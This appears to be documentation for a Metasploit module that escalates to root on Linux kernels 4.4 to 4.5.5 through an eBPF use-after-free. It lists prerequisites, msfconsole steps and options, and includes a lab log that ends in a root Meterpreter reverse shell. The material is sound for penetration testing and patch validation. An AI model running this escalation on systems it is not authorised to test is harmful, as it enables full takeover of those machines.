4.3 KiB
Notes
Linux kernel 4.4 < 4.5.5 extended Berkeley Packet Filter (eBPF) does not properly reference count file descriptors, resulting in a use-after-free, which can be abused to escalate privileges.
The target system must be compiled with CONFIG_BPF_SYSCALL
and must not have kernel.unprivileged_bpf_disabled set to 1.
Note, this module will overwrite the first few lines
of /etc/crontab with a new cron job. The job will
need to be manually removed.
Vulnerable Application
This module has been tested successfully on:
- Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)
This module was not tested against, but may work against:
- Fedora 24 < kernel-4.5.4-300.fc24
- Fedora 23 < kernel-4.5.5-201.fc23
- Fedora 22 < kernel-4.4.10-200.fc22
- Debian >= 4.4~rc4-1~exp1, < Fixed in version [4.5.3-1](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=82
- Ubuntu 14.04.1 <= 4.4.0-22.39
Creating A Testing Environment
There are a few requirements for this module to work:
CONFIG_BPF_SYSCALL=ymust be set in the kernel (default on Ubuntu 16.04)kernel.unprivileged_bpf_disabledcan't be set to1(default on Ubuntu 16.04)- fuse needs to be installed (non-default on Ubuntu 16.04)
Using Ubuntu 16.04, simply sudo apt-get install fuse and you're all set!
The libfuse-dev package must be installed to test live-compiling on the target:
apt-get install libfuse-dev=2.9.4-1ubuntu3.1
Verification Steps
- Start msfconsole
- Exploit a box via whatever method
- Do: `use exploit/linux/local/bpf_priv_esc
- Do:
set session # - Do:
set verbose true - Do:
exploit
Options
MAXWAIT
The first stage of this priv esc can take ~35 seconds to execute. This is the timer on how long we should wait till we give up on the first stage finishing. Defaults to 120 (seconds)
WritableDir
A folder we can write files to. Defaults to /tmp
COMPILE
If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto
Scenarios
Ubuntu 16.04 (with Linux 4.4.0-21-generic)
In this scenario, gcc and libfuse-dev are both installed so we can live compile on the system.
msf5 > use exploit/linux/local/bpf_priv_esc
msf5 exploit(linux/local/bpf_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/bpf_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/bpf_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/bpf_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] Kernel version 4.4.0-21-generic appears to be vulnerable
[+] fuse package is installed
[+] /tmp/fuse_mount doesn't exist
[+] Kernel config has CONFIG_BPF_SYSCALL enabled
[+] Unprivileged BPF loading is permitted
[+] libfuse-dev is installed
[+] gcc is installed
[+] pkg-config is installed
[*] Live compiling exploit on system...
[*] Writing '/tmp/hello.c' (2682 bytes) ...
[*] Writing '/tmp/doubleput.c' (5168 bytes) ...
[*] Writing '/tmp/suidhelper.c' (333 bytes) ...
[*] Uploading payload...
[*] Writing '/tmp/.FVfiRBKRDX7r' (285 bytes) ...
[*] Launching exploit. This may take up to 120 seconds.
[+] Success! set-uid root /tmp/suidhelper
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (861348 bytes) to 172.16.191.141
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.141:34804) at 2018-12-15 00:20:04 -0500
[+] Deleted /tmp/hello.c
[+] Deleted /tmp/hello
[+] Deleted /tmp/doubleput.c
[+] Deleted /tmp/doubleput
[+] Deleted /tmp/suidhelper.c
[+] Deleted /tmp/.FVfiRBKRDX7r
[+] Deleted /tmp/fuse_mount
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.141
OS : Ubuntu 16.04 (Linux 4.4.0-21-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >